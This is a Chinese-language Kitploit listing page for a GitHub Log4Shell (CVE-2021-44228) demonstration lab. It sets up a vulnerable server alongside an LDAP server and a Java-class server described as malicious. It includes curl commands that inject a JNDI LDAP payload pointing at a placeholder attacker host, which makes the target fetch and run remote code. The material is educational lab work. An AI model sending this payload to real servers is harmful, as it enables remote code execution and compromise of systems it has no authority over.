Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4Shell-demo — 演示Log4Shell / CVE-2021-44228漏洞的工作原理 | Kitploit
工具/GitHubGitHub/mschmnet/log4shell-demo
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubmschmnet/log4shell-demo

Log4Shell-demo

演示Log4Shell / CVE-2021-44228漏洞的工作原理

查看仓库
714年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4Shell 实战演示

本项目旨在演示 Log4Shell / CVE-2021-44228 漏洞的工作原理。

环境要求

你只需要安装 Docker。理想情况下,你拥有两台不同的虚拟机:一台用作漏洞服务器,另一台用作恶意服务器,用于托管恶意代码仓库和 LDAP 服务器。

你也可以选择安装 Make 和 Docker Compose,但并非必须,因为本仓库还提供了一个 make.sh 脚本,可以跳过这些要求,从 Docker 容器内部使用它们。

安装 Docker(可选)

如果你尚未安装 Docker,以下是 Debian 虚拟机的安装步骤:https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46

下载仓库

root@kitploit:~
git clone [email protected]:mschmnet/Log4Shell-demo.git 

安装漏洞服务器

root@kitploit:~
cd vulnerable-server
../make.sh run # 或者如果你已安装 Make 和 Docker Compose,也可以执行 make run

启动恶意服务器

这将启动一个基础 LDAP 服务器和一个基础 Python 服务器,用于提供恶意的 Java 类。

你需要提供这些服务器可访问的 IP 地址或域名。

root@kitploit:~
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # 可选:如果你已安装 Make 和 Docker Compose,可用 make 代替 ../make.sh

如何攻击目标服务器

root@kitploit:~
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint

或直接

root@kitploit:~
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'

其中 ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a} 已经过 URL 编码

如何停止任一服务器

root@kitploit:~
../make.sh stop

如何查看日志

root@kitploit:~
../make.sh logs 

幻灯片

https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf

下载工具